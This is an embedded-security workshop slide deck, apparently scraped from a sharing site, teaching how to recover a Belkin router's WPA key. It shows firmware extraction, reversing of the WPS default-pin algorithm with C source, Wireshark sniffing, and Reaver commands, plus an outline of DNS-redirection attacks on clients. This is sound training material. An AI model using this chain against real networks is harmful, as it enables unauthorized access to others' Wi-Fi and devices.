Upload
malachi-jones
View
32
Download
1
Embed Size (px)
Citation preview
Embedded Device Hacking
Session I: Obtaining Initial Remote Access
By: Malachi Jones, PhD
About Me
Education
Bachelors Degree: Computer Engineering (Univ. of Florida, 2007)
Master’s Degree: Computer Engineering (Georgia Tech, 2009)
PhD: Computer Engineering (Georgia Tech, 2013)
Cyber Security Experience
Harris: Cyber Software Engineer (2013-2014)
Harris: Vulnerability Researcher (2015)
Booz Allen DarkLabs : Embedded Security Researcher (2016- Present)
https://www.linkedin.com/in/malachijonesphd
About Dark Labs
Booz Allen Dark Labs is an elite team of security researchers,
penetration testers, reverse engineers, network
analysts, and data scientists, dedicated to stopping
cyber attacks before they occur.1
(1 http://darklabs.bah.com)
I. Motivation: Ubiquity of embedded devices
II. Objectives of Workshop
III. Workshop Overview
IV. The Workshop: Hacking a consumer router
Session I: Obtaining Initial Remote Access
Session II: Exploitation
Session III: pwnage
V. Conclusion
Outline
Motivation
Ubiquity of Embedded Devices
Critical Infrastructure (Nuclear Power Plant)
Life Critical Systems (Pace Maker)
Financial Infrastructure (Banking & Investing)
Internet of Things (IoT) (IoT Gadgets)
Commercial Products (Network Switch)
Transportation Systems (Jeep)
2015: A Year of Embedded Exploitation
(Link)
(Link)
2016: The Exploitation Continues…
?????
2017: Its Just Getting Started
Objectives of Workshop
Explore practical applications of reverse engineering
Discuss concepts/techniques that hackers utilize to uncover vulns in real-world embedded devices.
Provide a hands-on introduction to key pen-testing tools
Workshop Overview
Want to understand the process of hacking/ pentesting a sophisticated embedded system such as a car?
Workshop Overview
A first step is to first learn how to hack a consumer router
Why?
Its cheaper, so if you make a mistake and brick it, you won’t be out of +60k
Although a simpler system and easier target, the core pentesting principles and processes are similar
Workshop Overview
We’ll focus on a Belkin router (F5D7234-4 version 5)
Its pretty cheap (<$20) and is a pretty soft target that is suitable for individuals new to embedded hacking
Workshop Overview
Overall Hacking Objective:
Compromise an initial target (e.g wifi router) and then use that target as leverage to compromise other targets
Workshop Overview
Steps to Achieve Hacking Objective:
1) Obtain Initial remote access to the device
Wifi Router Context: This means the ability to connect to its network, which often requires knowledge of the wpa password
Workshop Overview
Steps to Achieve Hacking Objective:
2) Escalate privileges on device to admin/root
Wifi Router Context: Administrative privileges can allow us to control/manipulate the IP traffic of clients connected to device
Workshop Overview
Steps to Achieve Hacking Objective:
3) Exploit privileges to compromise other devices
Wifi Router Context: Send clients malicious IP traffic that allows us to compromise them also
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
17
Workshop Overview
Pwned
Workshop Overview
The workshop will be organized into three sessions that capture the pen-testing phases of going from discovery to p0wnage Session I: Discovery of a vulnerability in the WPS
implementation to obtain initial access on device
Session II: Exploring weaknesses in the web management interface to gain administrative access
Session III: Development of a proof of concept that demonstrates how a Windows 7 user can be p0wned via web browser with a maliciously configured router
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
19
Workshop Overview
Pwned
Session I
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
20
Workshop Overview
Pwned
Session II
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
21
Workshop Overview
Pwned
Session III
The Workshop
Hacking a Consumer Router
The Workshop
Session I:
Obtaining Initial Remote Access
to the Device
Session I: Outline
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing/Bug Hunting with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Overview (tldr)
WPS pin method is on by default on virtually all consumer routers
Design flaw in WPS allows pin to be brute forced in under 11000 attempts
Once a WPS pin is known, a tool such as Reaver can be utilized to retrieve the WPA key instantaneously (see next slide)
On some routers (including F5D7234-4), the default pin can be computed by reverse engineering the pin generation algorithm
Session I: The Big Picture
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Session I: The Big Picture
Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router
and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 1
Session I: The Big Picture
Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router
and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 2
Session I: The Big Picture
Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router
and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 3
End Result: Gain Access to Management Interface
Session I: The Big Picture
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to hacker’s server to resolve name address
Step 5: www.cnn.com now resolves to an IP address of hacker’s server
Step 6: Hacker provides malicious traffic to devices on the network
Step 7:
31
Session I: The Big Picture
Pwned
Session I
Session I: Outline
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing/Bug Hunting with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Background
1. WPS Design Flaw Explained
2. Exploiting Belkin’s PIN Generation Algorithm
3. IDA Pro
Background: WPS Explained
Wi-Fi Protected Setup (WPS) was created by Wi-Fi Alliance in 2006
Goal to make it easy for home users to add new devices securely to network w/o entering long passphrases
One of the modes allowed for user to enter the router’s 8 digit pin to connect a desired device to network
Background: WPS Explained
Design Flaw Explained WPS has an 8 digit pin numeric pin (0-9)
Number of attempts to bruteforce an 8 digit pin
1 2 3 4 5 6 7 8
108 = 100 million
Background: WPS Explained
Design Flaw Explained The 8th digit pin is a checksum
Number of attempts to bruteforce a 7 digit pin
1 2 3 4 5 6 7 8
107 = 10 million
Background: WPS Explained
Design Flaw Explained Pin split into two groups and a Nack/ack is sent that indicates if the pin
for that group is correct
Number of attempts to bruteforce a 7 digit pin split into groups( 4+ 3)
1 2 3 4 5 6 7 8
104 + 103= 11000
Nack/ Ack Nack/ Ack
We could exploit this design flaw for the Belkin
router that we are targeting to obtain pin
However, there is a WPS implementation flaw, specific to this router, that allows us to get the pin in 1 try vs 11,000
Background: WPS Explained
Background: Belkin Pin Generation Exploit
Pin generation exploit material presented in this workshop is based on the write-up by Craig @ www.devttys0.com
/DEV/TTYS0 provides excellent material on embedded hacking
in general and router hacking in particular
Background: Belkin Pin Generation Exploit
Belkin WPS Pin Algorithm
Note: Serial ID and WLAN MAC can be obtained by sniffing certain packets that are broadcast by the router
Pin Generation Algorithm
12345678
Serial ID
WLAN MAC
Background: IDA Pro
De facto tool for disassembling, decompiling, and debugging binaries
Supports a wide array of processor architectures that include the following: MIPS
ARM
X86/x64
Code Flow of Routine (sub_43A53C)
Background: IDA Pro Features
Code Flow of Routine (sub_43A53C)
For loop
Loop back Here
Branch taken to effectively exit function if de-referenced value is ‘0’
Background: IDA Pro Features
IDA Scripting support Supports python scripting, which is known as IDAPython
Provides a power way to add extensive utilities and features to python
Also has a native language, IDC, which is a “C-like” language
Decompiling with Hex-Rays (x86,x64, and ARM)
Background: IDA Pro Features
ARM Disassembly
Decompiled “Pseudo- C”
Background: IDA Pro Features
For more information on IDA, there is a pretty awesome book written by Chris Eagle
Background: IDA Pro Features
Professional Edition : $1500
Pro + Hex-rays decompiler (x86/x64 + ARM): $5500
Freeware version (link) Very old edition w/o newer features including IDAPython
only x86 disassembler support
Still a good starting point
Background: Acquiring IDA Pro
Binary Ninja (link) License: $99.00 (Personal License)
Up and coming legitimate alternative/competitor to IDA Pro
Supports x86/x64 , ARM, and MIPS
Decompiler support
OS Platforms: Windows, OSX , and Linux
Background: IDA Pro Alternatives
Background: IDA Pro Alternatives
Binary Ninja Screenshot
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing/Bug Hunting with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Outline
Required Material
Software
Kali Linux VM 1.X
IDA Pro
Vmware/ VirtualBox
Hardware Belkin F5D7234-4 version 5
Wifi adapter w/ monitor mode
(e.g. TP-LINK TL-WN722N)
Required Material
I. Overview
II. Background
III. Required Material
IV. Big Picture
V. Lab 1: Firmware Data Extraction
VI. Lab 2: Reversing/Bug Hunting with IDA Pro
VII. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Outline
Lab 1: Firmware Data Extraction & Analysis
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 1
Lab 1: Firmware Data Extraction & Analysis
Steps for Extraction & Analysis
1. Install squashfs-tools if not installed
2. Perform initial analysis of firmware w/ Binwalk
3. Extract firmware data
4. Explore the squash file system folder
Extraction and Analysis (Steps)
1) Install squashfs-tools if not installed
(Next Slide)
Install squashfs-tools if not installed
$ sudo apt-get install squashfs-tools
Extraction and Analysis (Steps)
2) Let binwalk do an initial analysis of firmware
(Next Slide)
Initial analysis with Binwalk
$ sudo binwalk DIR810LB1_FW203B02.bin payload);
3) Extract firmware data
(Next Slide)
Extraction and Analysis (Steps)
Extract Firmware Data
$ sudo binwalk –e DIR810LB1_FW203B02.bin
4) Explore files in the squash file system folder
(Next Slides)
Extraction and Analysis (Steps)
Explore squash filesystem
ls –l /$absolute-path-to-squash-folder
Explore squash filesystem
ls –l /$absolute-path-to-squash-folder/sbin
Contains the WPS pin generation logic
Lab 1: Q&A
Why are we using Dlink firmware instead of Belkin? Dlink has symbols (e.g. function names) which makes it easier to follow for
those newer to reversing
Stripped firmware (i.e. no symbols) can be very difficult and take a substantial amount of time to reverse
Pin generation algorithm is conceptually similar between the Dlink and Belkin routers
What is a technique that can be used to help reverse engineer stripped binaries? Make use of the debug strings found in binary to build intuition about what a
routine is doing
Lab 1: Q&A
How did we know the WPS pin generation logic could be found at the following location: /sbin/ncc? Can create an IDAPython script that iterates through the binaries in the
filesystem to search for specific symbols and strings
Strings and symbols of interest could contain “WPS”, “WPS Pin”, “Pin generation” , etc….
How can the firmware be acquired? [Easy] Manufacturer’s website
[Difficult] Manual extraction from the device via JTAG or the serial port (see next 2 slide)
Note: Forge Hackerspace has a workshop on manual firmware extraction !!
Linksys WRT120N PCB (Serial Port)
Serial Port
Linksys WRT120N PCB (Serial Port)
Serial Port
Additional Resources Reverse Engineering Firmware: http://www.devttys0.com/2011/05/reverse-
engineering-firmware-linksys-wag120n/
Lab 1: Firmware Data Extraction
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Session I: Outline
Lab 2: Reversing with IDA Pro
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 2
Description In this lab, we will take a look at the binary ncc, located in /sbin of the
squash filesystem
Since ncc has quite a bit of WPS logic, which includes the pin generation algorithm, we’ll do some exploring
We’ll walk through the process of locating a code segment of interest (wps algorithm) and illustrate the process of reversing the segment into C code
Lab 2: Reversing with IDA Pro
Steps for Bug Hunting and Reversing
1. Load the binary ncc into IDA Pro for analysis
2. Hunt for the pin generation algorithm
3. Analyze the inputs of the algorithm
4. Reverse algorithm segment into C code
Lab 2: Reversing with IDA Pro
1) Load the binary ncc into IDA Pro for
analysis
(Next Slide)
Lab 2: Reversing with IDA Pro (Steps)
Load the binary ncc into IDA Pro
1a. Launch IDA Pro
Load the binary ncc into IDA Pro
1b. Click “New”
Load the binary ncc into IDA Pro
1c. Drag ncc binary into IDA
ncc binary
IDA detects that
binary is a
MIPS ELF
Load the binary ncc into IDA Pro
1d. Click “ok”
Load the binary ncc into IDA Pro
1e. Wait for IDA to finish analyzing the binary
Load the binary ncc into IDA Pro
1f. IDA indicates auto analysis has been finished
Auto analysis
complete
2) Hunt for the pin generation algorithm
(Next Slide)
Reversing with IDA Pro (Steps)
Hunt for the pin generation algorithm
1a. See if you can find the pin generation routine
Hunt for the pin generation algorithm
a. (Hint: What happens when I search for “router” in the Function Window)
Note: Ctrl+F brings up search box Term “router” entered into the function name
filter
a. (Hint: What happens when I search for “router” in the Function Window)
Hunt for the pin generation algorithm
Term “router” entered into the function
name filter
a. (Hint: Try some search terms relevant to the algorithm we’re trying to find)
Try your own search
terms ???
Hunt for the pin generation algorithm
a. (Try a few more keywords before you go to the next slide!!!)
Try your own search terms
???
Hunt for the pin generation algorithm
Hunt for the pin generation algorithm
b. Let’s try the keyword “default” and see what we get
This looks interesting
Hunt for the pin generation algorithm
c. Double click on “get_default_pin”
Hunt for the pin generation algorithm
c. (Continued…)
3) Analyzing the pin algorithm in
subroutine get_default_pin
(Next Slide)
Lab 2: Reversing with IDA Pro (Steps)
Analyze pin generation algorithm
a. Lets examine possible input sources to algorithm
Analyze pin generation algorithm
a. Lets examine possible input sources to algorithm A call is made to a
sub-routine that appears to get some
information
Subset of data from lockAndGetInfo_log
will be formatted as follows: “%c:%:c%:c%….”
Any guesses on what “%c:%c…” might be?
Hunt for the pin generation algorithm
b. Lets take a closer look at the sprintf call
Decompiling by hand to pseudo C
char buffer [….];
char * data =lockAndGetInfo_log->interesting_data_element
……………………………………
sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
Hints
Its 12 characters with a “:” in between each pair of 2 characters
This is a networking device
What is something (e.g. identifier) that each networking devices typically has that would be a good seed for a pin generation algorithm?
Hunt for the pin generation algorithm
c. Figure out what type of data could “%c%c…:%c%c” represent
char buffer [….];
char * data =lockAndGetInfo_log->interesting_data_element
……………………………………
sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
Answer: MAC address Unique across all networking devices
12 bytes
Often used in combination with other values to seed various algorithms
Hunt for the pin generation algorithm
c. Figure out what type of data could “%c%c:..:%c%c” represent
char buffer [….];
char * data =lockAndGetInfo_log->interesting_data_element
……………………………………
sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
4) Reverse algorithm segment into C code
(Next Slide)
Extraction and Analysis (Steps)
As we will see, reversing assembly into C can be a tedious and arduous process
We will reverse the following code segment:
Reverse algorithm segment into C code
a. Reversing an example snippet of code
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly Psuedo-C code
v0 = 0x38E38E39
MIPS Instruction ‘li’:
Loads a constant value into a register
Value will be used for future arithmetic operation
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly Psuedo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
MIPS Instruction ‘multiu’:
Multiply two 32-bit values (e.g. a3 & v0)
Registers `hi’ & ‘lo’ store the resulting 64-bit product
hi (upper 32-bits) lo (lower 32-bits)
64-bit product
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly Psuedo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
v0 = (v0*a3)>>32; right shift 32
MIPS Instruction ‘mfhi’:
Move value in ‘hi’ register to specified register (e.g. v0)
This is equivalent to right shifting the 64-bit product of v0 & a3 by 32-bits
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly Psuedo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
v0 = (v0*a3)>>32; right shift 32
v0 = v0 >> 1;
= ((a3 * 0x38E38E39) >>32) >> 1
MIPS Instruction ‘srl’:
Shift right logical
Logical means that the bit that replaces the most upper bits as the shift occurs is the value ‘0’
Lower bits that get shifted out are discarded
Observations
The net result of the assembly instructions is a complex looking expression
It turns out that this can be simplified quite a bit
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
Observations
Logical shifts have an associative property
e.g. (v1>> 32) >> 1 == v1 >> 33
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
Observations
Right shifting a number by 1 has the effect of dividing that number by 2.
Therefore right shifting a number by 33 has the effect of
dividing that number by 2^33 = 8589934592
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
Observations
(954437177)10 = 0x38E38E39
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
= (a3)(954437177/8589934592)
Observations
1/9 ~=(954437177)/8589934592
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
= (a3 * 0x38E38E39)/8589934592
= (a3)(954437177/8589934592)
= (a3)(1/9)
Observations As the above example illustrates, the disassembly performs operations such
as shifts to do multiplication and division
What looks complex may be able to be decompiled into something much simpler
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
v0 = ($a3)/9
Disassembly C code
Luckily someone else (Craig) did all the grunt work in decompiling the disassembly for us
But we’ve seen how the general process for reversing works, so in theory we could do it
On the next slides, we’ll show the complete C implementation of the get_default_pin algoritm
Reverse algorithm segment into C code
b. Reversing the entire algorithm
dd
/* * The largest possible remainder for any value divided by 10,000,000 * is 9,999,999 (7 digits). The smallest possible remainder is, * obviously, 0. */
pin = pin % 10000000; /* The pin needs to be at least 7 digits long */ if(pin < 1000000) { /* * The largest possible remainder for any value divided by 9 is * 8; hence this adds at most 9,000,000 to the pin value, and at * least 1,000,000. This guarantees that the pin will be 7 digits * long, and also means that it won't start with a 0. */
pin += ((pin % 9) * 1000000) + 1000000; } /* * The final 8 digit pin is the 7 digit value just computed, plus a * checksum digit. Note that in the disassembly, the wps_pin_checksum * function is inlined (it's just the standard WPS checksum implementation). */
pin = ((pin * 10) + wps_pin_checksum(pin)); sprintf(buf, "%08d", pin); return pin; }
get_default_pin (Dlink router)
unsigned int generate_default_pin(char *buf) { char *mac; char mac_address[32] = { 0 }; unsigned int oui, nic, pin;
/* Get a pointer to the WAN MAC address */ mac = lockAndGetInfo_log()->wan_mac_address;
/* * Create a local, NULL-terminated copy of the WAN MAC (simplified from * the original code's sprintf/memmove loop). */ sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0], mac[1], mac[2], …… mac[11] sscanf(mac_address, "%06X%06X", &oui, &nic); /* Do some XOR munging of the NIC. */ pin = (nic ^ 0x55AA55); pin = pin ^ (((pin & 0x0F) << 4) + ((pin & 0x0F) << 8) + ((pin & 0x0F) << 12) + ((pin & 0x0F) << 16) + ((pin & 0x0F) << 20));
We could follow a similar process to reverse the Belkin Pin algorithm
Yet again, Craig has spared us the trouble
On the next slide is the reversed C implementation of the Belkin algorithm
Reverse algorithm segment into C code
c. Reversing the Belkin Pin Generation Algorithm
k1 = (sn[SN_DIGIT_2] + sn[SN_DIGIT_3] + nic[NIC_NIBBLE_0] + nic[NIC_NIBBLE_1]) % 16; k2 = (sn[SN_DIGIT_0] + sn[SN_DIGIT_1] + nic[NIC_NIBBLE_3] + nic[NIC_NIBBLE_2]) % 16; pin = k1 ^ sn[SN_DIGIT_1]; t1 = k1 ^ sn[SN_DIGIT_0]; t2 = k2 ^ nic[NIC_NIBBLE_1]; p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1; p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2; p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2]; k1 = k1 ^ k2; pin = (pin ^ k1) * 16; pin = (pin + t1) * 16; pin = (pin + p1) * 16; pin = (pin + t2) * 16; pin = (pin + p2) * 16; pin = (pin + k1) * 16; pin += p3; pin = (pin % 10000000) - (((pin % 10000000) / 10000000) * k1) return (pin * 10) + wps_checksum(pin); }
get_default_pin (Belkin router) /* Munges the MAC and serial numbers to create a WPS pin */ int pingen(char *mac, char *serial) { #define NIC_NIBBLE_0 0 #define NIC_NIBBLE_1 1 #define NIC_NIBBLE_2 2 #define NIC_NIBBLE_3 3 #define SN_DIGIT_0 0 #define SN_DIGIT_1 1 #define SN_DIGIT_2 2 #define SN_DIGIT_3 3 int sn[4], nic[4], mac_len, serial_len; int k1, k2, pin p1, p2, p3 t1, t2; mac_len = strlen(mac); serial_len = strlen(serial); /* Get the four least significant digits of the serial number */ sn[SN_DIGIT_0] = char2int(serial[serial_len-1]); sn[SN_DIGIT_1] = char2int(serial[serial_len-2]); sn[SN_DIGIT_2] = char2int(serial[serial_len-3]); sn[SN_DIGIT_3] = char2int(serial[serial_len-4]); /* Get the four least significant nibbles of the MAC address */ nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]); nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]); nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]); nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);
Lab 2: Q&A
Why are weaknesses in implementation of a security design not discovered before product released? Companies care more about time-to-market
Subscribe to the notion of security through obscurity
How long does the reverse engineering process take? Depends on the device and the skills of the personnel
Charlie and Chris (Chrysler Jeep hack) said it took them over 3.5 months and they are pretty experienced
Lab 2: Q&A
Is the reverse process always this tedious? In general…yes, if not more so.
What things can make reversing harder? Stripped binaries (e.g. no symbols)
Anti-debugging techniques
Code obfuscation
Writing original code in C++
What is an ELF (Executable and Linkable Format)? Standard file format on Unix-like systems
Lab 2: Q&A
Why is MIPS still popular in embedded devices? Licensing costs for MIPS is cheaper than ARM
Why couldn’t we decompile using IDA Pro? IDA only supports ARM and x86/64
No reliable decompilers for MIPS in general.
Additional Resources Reversing D-Link’s WPS Pin Algorithm:
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
Lab 2: Reversing with IDA Pro
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark
& Reaver
Session I: Outline
Lab 3: Obtaining initial access
Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
Obtain inputs to algorithm by
sniffing traffic
Generate pin and use reaver
to get password
Lab 3
Description In this lab, we will explore how to use our knowledge of the pin generation
algorithm to derive the WPA Key
Specifically, we will first need to acquire relevant input information into the algorithm by using Wireshark, and then run the algorithm to compute the WPS PIN
Then we’ll need to use Reaver to derive the WPA key from the WPS PIN
Lab 3: Obtaining initial access
Steps for Obtaining initial access
1. Acquire serial and wlan mac w/ Wireshark
2. Compile & execute wps pin generation algorithm
3. Run Reaver to obtain the WPA key
4. Connect to the router utilizing obtained WPA key
Lab 3: Obtaining initial access
1) Acquire Serial and WLAN MAC with
Wireshark
(Next Slides)
Lab 3: Obtaining initial access
We’ll need a wifi adapter that supports monitor mode
Monitor mode enables monitoring of all traffic received
Normally, the wifi adapter will filter out traffic not destined for it
An example wifi adapter that supports monitor mode is the TP-LINK TL-WN722N
(pictured above); cost about $12
Acquiring serial and wlan information
a. Attach Wifi adapter (monitor mode support) to PC
b. Connect wifi adapter to guest Kali-Linux VM
Acquiring serial and wlan information
Click this
b. Connect wifi adapter to guest Kali-Linux VM
Acquiring serial and wlan information
Click This
c. Get the name of the wireless interface (e.g. wlanx),were x is 0-9
Acquiring serial and wlan information
$ sudo iwconfig
Wireless Interface Name
d. Bring the wireless interface down so we can configure it
Acquiring serial and wlan information
$ sudo ifconfig wlanx down
e. Change the wifi mode to monitor
Acquiring serial and wlan information
$ sudo iwconfig wlan0 mode monitor
f. Set the channel of wireless interface to channel y, where y in 1-12
Acquiring serial and wlan information
$ sudo iwconfig wlan0 channel %y%
g. Bring the wireless interface back up
Acquiring serial and wlan information
$ sudo ifconfig wlan0 up
h. Launch Wireshark
Acquiring serial and wlan information
$ sudo wireshark
h. Click on wireless interface wlanx
Acquiring serial and wlan information
Click this
i. Click Start
Acquiring serial and wlan information
Click this
i. Click Start
Acquiring serial and wlan information
i. (Continued)
Acquiring serial and wlan information
j. Wait approximately 1-3 minute(s) as Wireshark captures packets
Acquiring serial and wlan information
k. Stop the capture
Acquiring serial and wlan information
Click to stop Capture
l. Find a probe response message from Belkin_xx:xx:xx and click on it
Acquiring serial and wlan information
m. Click on “IEEE 802.11 wireless LAN management” to expand the selection
Acquiring serial and wlan information
Click to expand
n. (After click)
Acquiring serial and wlan information
o. Click on “Tagged parameters” to expand the selection
Acquiring serial and wlan information
After Click
p. Click on “Vendor Specific” to expand the selection
Acquiring serial and wlan information
After Click
q. Locate and record the Serial Number
Acquiring serial and wlan information
Serial Number
r. Locate and Record wlan MAC address of the Belkin router
Acquiring serial and wlan information
MAC Address
2. Compile & execute wps pin
generation algorithm
(Next Slides)
Lab 3: Obtaining initial access
a. Download pingen algorithm source from here and save to home dir
Compile & Execute WPS pingen Algorithm
b. Compile pingen.c
Compile & Execute WPS pingen Algorithm
$ sudo gcc -Wall pingen.c -o pingen
c. Executing the pingen binary to see usage
Compile & Execute WPS pingen Algorithm
$ ./pingen
d. Pass in appropriate parameters and execute pingen to get pin
Compile & Execute WPS pingen Algorithm
$ ./pingen xxxx xxxx
Default Pin
e. The Results
Compile & Execute WPS pingen Algorithm
The Pin
Default Pin
e. The Results
Compile & Execute WPS pingen Algorithm
The Pin
3. Run Reaver to obtain WPA Key
(Next Slides)
Lab 3: Obtaining initial access
a. Executing Reaver with appropriate arguments
Run Reaver to Obtain WPA Key
reaver -i (monitor interface) -b (BSSID) -c (channel) ---pin=(8 digit pin) –T 5 -vv
b. Wait for the Results (can take up to 30 seconds)
Run Reaver to Obtain WPA Key
WPA KEY
4. Connect to the router by utilizing
the obtained WPA key
(Next Slides)
Lab 3: Obtaining initial access
a. Bring the wireless interface down so we can configure it
Connect to router with WPA key
$ sudo ifconfig wlanx down
b. Change the wifi mode to managed
Connect to router with WPA key
$ sudo iwconfig wlan0 mode managed
c. Bring the wireless interface back up
Connect to router with WPA key
$ sudo ifconfig wlan0 up
c. Wait about a minute or so for the interface to be brought up
Connect to router with WPA key
d. Click the networking icon
Connect to router with WPA key
Click this icon
e. Select the Appropriate Access Point
Connect to router with WPA key
Click on the appropriate AP
f. Enter the WPA key and connect
Connect to router with WPA key
Enter WPA Key
g. Wait while connection occurs
Connect to router with WPA key
Connecting…
h. Connection is established
Connect to router with WPA key
Success!!
h. Connect to web management server (Obtained Initial Access!!)
Connect to router with WPA key
i. Log into web management interface (Preview of next session)
Connect to router with WPA key
We’ll figure out how to gain admin access in Session II
Lab 3: Q&A
What’s the difference between monitor mode and promiscuous mode? Promiscuous mode allows packets to be sniffed only on the AP the wifi
adapter is currently connected to
Monitor mode allows all packets on a particular channel to be sniffed if packets are in listening range
Are there any other interesting wifi modes? Master mode, which allows the wifi adapter to behave as an access point
The TP Link adapter also supports this mode
References
[1] WPS Vulnerability, University of Alabama, Huntsville
Recap
Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to
router and the connected clients
Reverse engineer
algorithm
Extract Firmware to find
pin algorithm
